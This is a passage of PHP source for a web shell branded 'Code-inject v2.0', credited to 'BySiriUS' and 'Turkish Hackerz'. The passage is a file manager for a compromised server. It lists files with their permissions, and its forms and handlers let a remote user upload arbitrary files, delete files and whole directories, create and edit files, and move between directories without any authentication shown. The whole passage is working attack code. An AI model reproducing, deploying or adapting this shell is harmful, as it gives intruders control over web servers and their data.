echo "<font face='Comic Sans MS' size=2>";
$perms = fileperms($ccc.$file);
if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
echo $info;
echo "</font></td>";
echo "</tr>";
}
closedir($dh);
}
}
echo "</table></center>";
//Table Make Directory
echo "<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 height='1' width='100%' bgColor=#333333 borderColorLight=#c0c0c0 border=1 id='table1'>
<form method='POST' action=''>
<tr><a bookmark='minipanel' style='font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none'>
<td width='50%' height='1' valign='top' style='font-family: verdana; color: #d9d9d9; font-size: 11px'><center>
<a bookmark='minipanel' style='font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none'>
<b><font face='Comic Sans MS' size='2'>.:Make Directory:.</font><font color='#FFFFFF'> </font></b>
<font color='#FFFFFF'><br>Filename:</font>
<a bookmark='minipanel' style='font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none'>
<input type='text' name='mkdir' value=$ccc size='50' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px solid #666666; background-color: #000000'></a><input type='submit' name='make' value=' make ' style='color: #FFFFFF; border: 1px dotted #FFFFFF; background-color: #000000; font-size:8pt' /></td>
</tr><br></form></table><br>";
//Table (Upload and Delet file)
echo "<table style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 height='1' width='100%' bgColor=#333333 borderColorLight=#c0c0c0 border=1 id='table1'>
<tr>
<td width='25%' height='1' valign='top' style='font-family: verdana; color: #d9d9d9; font-size: 11px'>
<p align='center'></form><a bookmark='minipanel'>
<b><font face='Comic Sans MS' size='2'>
<a style='font-weight: normal; color: #dadada; text-decoration: none'>.:Delete file:.</a></font></b></a><br><a bookmark='minipanel' style='font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none'>
<form method='POST' action=''>
<center>
<input type='text' name='delete' value='$ccc' size='50' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px solid #666666; background-color: #000000'><br><input type='submit' value='Delete' size='50' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px dashed #FFFFFF; background-color: #000000'></center></form></td>
<td width='25%' height='1' valign='top' style='font-family: verdana; color: #d9d9d9; font-size: 11px'><a bookmark='minipanel' style='font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none'>
<center>
<form method='POST' enctype='multipart/form-data'>
<b><font face='Comic Sans MS' size='2'>.:Upload:.</font><font color='#FFFFFF'> </font></b><br>
<input type='file' name='xfile' size='50' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px solid #666666; background-color: #000000'>
<br>
<input type='submit' value='Upload' size='50' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px dashed #FFFFFF; background-color: #000000'>
</form></center></td></tr>
</table><br>";
//Table (Change Directory & Edit File)
echo "<table style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 height='1' width='100%' bgColor=#333333 borderColorLight=#c0c0c0 border=1 id='table1'>
<tr>
<td width='25%' height='1' valign='top' style='font-family: verdana; color: #d9d9d9; font-size: 11px'>
<p align='center'></form><a bookmark='minipanel'>
<b><font face='Comic Sans MS' size='2'>
<a style='font-weight: normal; color: #dadada; text-decoration: none'>.:<span lang='en-us'>Change
Directory</span>:.</a></font></b></a><a bookmark='minipanel' style='font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none'><form action='' method=GET>
<p align='center'><b></b>
<input type=text name=dir value=\"".realpath('.')."\" size='50' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px solid #666666; background-color: #000000'><br><input type=submit value=\"Change\" style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px dashed #FFFFFF; background-color: #000000'></p>
</form>
<td width='25%' height='1' valign='top' style='font-family: verdana; color: #d9d9d9; font-size: 11px'>
<center>
<p align='center'>
<a bookmark='minipanel' style='font-weight: normal; color: #dadada; text-decoration: none'>
<b><font face='Comic Sans MS' size='2'>.:Edit File:.</font></b></p><font size=1 face='Verdana'>".stripslashes($file)."</font><br><form method=POST action=''><input type=text name='editfile' value=$ccc size='50' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px solid #666666; background-color: #000000'><br><input type=submit name='editgo' value=' Go ' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px dashed #FFFFFF; background-color: #000000'></form>
</center></td></tr>
</table>";
//Table (Delete Directory & Make File)
echo "<br><table style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 height='1' width='100%' bgColor=#333333 borderColorLight=#c0c0c0 border=1 id='table1'>
<tr>
<td width='25%' height='1' valign='top' style='font-family: verdana; color: #d9d9d9; font-size: 11px'>
<p align='center'></form><a bookmark='minipanel'>
<b><font face='Comic Sans MS' size='2'>
<a style='font-weight: normal; color: #dadada; text-decoration: none'>.:Delete
Directory:.</a></font></b></a><br><center>
<form method=POST action=''><input type=text name=dd value=$ccc size='50' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px solid #666666; background-color: #000000'>
<br><input type=submit name=dgo value=Delete style='color: #FFFFFF; border: 1px dotted #FFFFFF; background-color: #000000; font-size:8pt'></form></center>
<td width='25%' height='1' valign='top' style='font-family: verdana; color: #d9d9d9; font-size: 11px'>
<center>
<p align='center'>
<a bookmark='minipanel' style='font-weight: normal; color: #dadada; text-decoration: none'>
<b><font face='Comic Sans MS' size='2'>.:Make File:.</font></b></p>
<form method=post action=''>
<input type=text name=title value=$ccc size='50' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px solid #666666; background-color: #000000'>
<br><input type='submit' name=gomkf value=Make style='color: #FFFFFF; border: 1px dotted #FFFFFF; background-color: #000000; font-size:8pt'>
</form>
</center></td></tr>
</table>";
//footer table
echo "
<br><table style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 height='1' width='100%' bgColor=#333333 borderColorLight=#c0c0c0 border=1 id='table1'>
<tr>
<td width='25%' height='1' valign='top' style='font-family: verdana; color: #d9d9d9; font-size: 11px'>
<p align='center'>Powered By
<a title='::????? ??? ????::' href='http://Code-inject.org'><font color='#FF0000'>Code-inject</font></a> v2.0<br>[Coded BySiriUS<a href='http://Code-inject.ORG'><font color=red>Code-inject</font></a> Team) ]<br>
<br>Copyright is reserved for BySiriUS<br>Turkish Hackerz</td></tr></table>";
//Make Directory
if ($_POST['make'])
{
mkdir($mkdir,0777);
echo "<script>alert('Directory Made :) ');</script>";
}
//Upload
if (!empty ($_FILES['xfile']))
{
move_uploaded_file($_FILES['xfile']['tmp_name'],$_FILES['xfile']['name']);
echo "<script>alert('Uploaded :)'); </script><b>Uploaded !!!</b><br>Filename : ".$_FILES['xfile']['name']."<br>Filesize : ".$_FILES['xfile']['size']."<br>Filetype : ".$_FILES['xfile']['type'];
echo "<script language='javascript'> history.back(1)</script>";
}
//Delete file
if (isset($fdel))
{
unlink($fdel);
echo "<script>alert('File Deleted :)')</script>";
echo "<script language='javascript'> history.back(1)</script>";
}
//Delete Directory
$dpath=$_GET['dirdel'];
if ($dpath <> "")
{
if (is_dir($dpath))
{
$matches = glob($dpath . '/*.*');
if ( is_array ( $matches ) )
{
foreach ( $matches as $filename)
{
unlink ($filename);
rmdir("$dpath");
echo "<script> alert('Success!')</script>";
echo "<script> history.back(1)</script>";
}
}
}
}
